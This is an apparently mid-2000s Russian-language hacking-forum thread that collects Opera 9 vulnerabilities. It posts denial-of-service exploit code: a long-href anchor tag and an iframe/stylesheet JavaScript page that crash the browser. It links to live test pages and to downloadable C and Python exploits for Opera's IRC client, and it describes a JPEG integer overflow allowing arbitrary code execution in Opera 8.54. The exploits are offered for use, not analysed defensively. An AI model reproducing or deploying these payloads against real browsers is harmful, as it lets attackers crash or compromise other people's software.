• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: Opera

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
Opera 9 (long href) Remote Denial of Service Exploit
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.

Уязвимость существует при обработке данных в параметре href тега <a>. Удаленный пользователь может с помощью специально сформированной ссылки аварийно завершить работу браузера.
Пример/Эксплоит:
Код:
<a href="http://aaaaaaaa...aaa
милворм

Протестить можно здесь:
_http://www.critical.lt/research/opera_die_happy.html
 
всего лишь DoS...
Касперский палит страницы подобного содержания :)
 
я вот каспера ваще не переношу..
алень аленем..
мой слабый комп + каспер...
он повиснуть может при открытии блокнота..
имхо др вэб rule the world....
[mod][not null:] Warning! Offtopic detected! Здесь не тема обсуждения предпочтения антивирусного софта[/mod]

ога... сори за офтоп... :cry2:
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Да.....последняя бетка оперы отвалилась.....Самое интеересное, что и фаерфокс 1.5.0.4 тоже не очень коректо обработал данный баг - попытался подвиснуть.......
Вот блин браузеры для профи:) гыгыгы. А всеми заблеванный ослик таже не залагнул.
 
Переполнение буфера в Opera
Уязвимы: 8.54 и, возможно, более ранние версии
Неуязвимы: 9.0
Целочисленное переполнение буфера при обработке JPEG-изображений позволяет злонамеренному пользователю с помощью специально составленного изображения выполнить произвольный код на целевой системе.
Решение - установить новую версию браузера.
 
Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit
Эксплоит:
Код:
<html>
<iframe src="palsu.php" name="fake"  ></iframe> 
<script type="text/javascript">
function mystyle() {
    if (fake.document.styleSheets.length == 1 ) 
	{
      f = document.forms["basicstyle"].elements;
      for (j = 0; j < f.length; j++) 
    {
        if (f[j].name == 'fsmain');
      	}  
      }

 }
mystyle();
</script>
</html>

проверить можно здесь:
_http://y3dips.echo.or.id/opera9-dos/
 
Opera 9 IRC client Remote DoS
удаленный пользователь может вызвать отказ в обслуживании
Эксплоиты:
C version
:zns5: Скачать|Download
Py version
:zns5: Скачать|Download
 
Вот немного инфы о ней:
Уязвимость существует при обработке данных в параметре href тега . Удаленный пользователь может с помощью специально сформированной ссылки аварийно завершить работу браузера.
«Дыре» присвоен рейтинг опасности «средняя». Для использования уязвимости есть эксплойт. В настоящее время способов устранения уязвимости не существует.

Зато точно (вроде) пофиксена предыдущая дыра, обнаруженная в версиях 8.54 и ранее - когда через специально сформированное jpeg-изображение удалённый злобный пользователь мог выполнить какой угодно произвольный код на машине пользователя (ошибка при обработке jpeg изображений вызывает целочисленное переполнение буфера).

Так что 9-ка рулит однозначно. :thumbsup:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх